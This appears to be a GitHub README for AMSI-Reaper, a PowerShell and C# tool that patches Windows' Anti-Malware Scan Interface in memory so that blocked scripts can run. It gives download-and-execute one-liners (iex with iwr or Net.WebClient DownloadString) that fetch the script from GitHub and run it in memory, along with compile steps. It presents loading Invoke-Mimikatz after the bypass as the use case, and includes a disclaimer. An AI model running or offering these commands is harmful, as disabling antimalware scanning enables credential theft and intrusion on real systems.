![reaper](https://private-user-images.githubusercontent.com/117091833/277834143-24861e69-df06-477d-8844-a0d4015ef830.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxOTAzMjAsIm5iZiI6MTcyMjE5MDAyMCwicGF0aCI6Ii8xMTcwOTE4MzMvMjc3ODM0MTQzLTI0ODYxZTY5LWRmMDYtNDc3ZC04ODQ0LWEwZDQwMTVlZjgzMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQxODA3MDBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zOGRiNjU0MjFlZjdhYjY5MTQwZGRhN2RhMDk3NGI3YTA4YjgwMTIxNjFjYTI4OTQxMjljMzQzOGVkN2YwNmU3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.MQSlHaAiErRIxyus3KYshmo30X--cfUBcCTzOFRVUXo)
- AMSI-Reaper is a tool developed in both PowerShell and C# (.NET Framework v4.0) designed to bypass the Anti-Malware Scan Interface (AMSI) in Windows.
- AMSI is a built-in security feature in Windows that allows applications and services to integrate with antimalware products.
- By default, it provides a layer of protection against potentially malicious scripts and code executed in applications like PowerShell.
- Check out more on the YouTube Video
- Bypass AMSI: AMSI-Reaper injects code into the memory of the AMSI components, preventing them from interfering with your scripts.
- PowerShell and C# Support: The tool is available in both PowerShell and C# versions, making it adaptable to different use cases.
- AMSI-Reaper requires Administrator privileges to function correctly. Please run the tool as an Administrator.
iex (iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1')
wget https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs
iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AMSI-Reaper.cs
- The AMSI-Reaper tool is meant for educational and research purposes only. The author is not responsible for any misuse, damage, or legal consequences caused by the use of this tool.
- Invoke-Mimikatz is detected and blocked by AMSI
![image1](https://private-user-images.githubusercontent.com/117091833/277832284-6dba8127-9fec-41ec-ba8d-f70d01678dea.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxOTAzMjAsIm5iZiI6MTcyMjE5MDAyMCwicGF0aCI6Ii8xMTcwOTE4MzMvMjc3ODMyMjg0LTZkYmE4MTI3LTlmZWMtNDFlYy1iYThkLWY3MGQwMTY3OGRlYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQxODA3MDBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zMmIyOTAyNDFiYzRlNDNmMzIwZDE5Y2RlNzA5YWUyZjQ2NTY4NTg0NTZiMTdhYWJiYTEzMTYyYTU5ZjhmYTk0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.qkbP_MYVDkF6kZX0TWvG9ik4KxJ5q6vYdvJfC740MzM)
- With AMSI-Reaper in PowerShell, we can request and use it from the command line in real-time, all in memory.
![image2](https://private-user-images.githubusercontent.com/117091833/277832496-dbcf74d0-a3c3-4e64-a024-3b2bea604f37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxOTAzMjAsIm5iZiI6MTcyMjE5MDAyMCwicGF0aCI6Ii8xMTcwOTE4MzMvMjc3ODMyNDk2LWRiY2Y3NGQwLWEzYzMtNGU2NC1hMDI0LTNiMmJlYTYwNGYzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQxODA3MDBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hNDI1YzkzODc2MDhlNWFkZDMwN2RkYzg3MzQ3Mjg2NWExNzIwNWUxZDE5ODcwNTNlM2U4MWZkNTNlZGJjYjNkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.GQNpVCuZyROzzx8brTJUkGLtm0-iL-pMMHwAmZFP_YE)
- Alternatively, you can also use AMSI-Reaper in C# with native Windows features by compiling it with csc.
![image3](https://private-user-images.githubusercontent.com/117091833/277832993-8906a6ab-d2d8-4ace-906c-2e0869040aa7.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjIxOTAzMjAsIm5iZiI6MTcyMjE5MDAyMCwicGF0aCI6Ii8xMTcwOTE4MzMvMjc3ODMyOTkzLTg5MDZhNmFiLWQyZDgtNGFjZS05MDZjLTJlMDg2OTA0MGFhNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNzI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDcyOFQxODA3MDBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lZTJkMjQ2OGM5ZDRjNWFkMGI1YzgwNjI4NTVhNzZhMzZjMmZlMmIzZmRmZGQzNThhMjNlZGQ0ZTM3NWE4ZTI2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.6OnWF4N2NIULzkLxzd75vhsA8kph4oato7LdkoALpNo)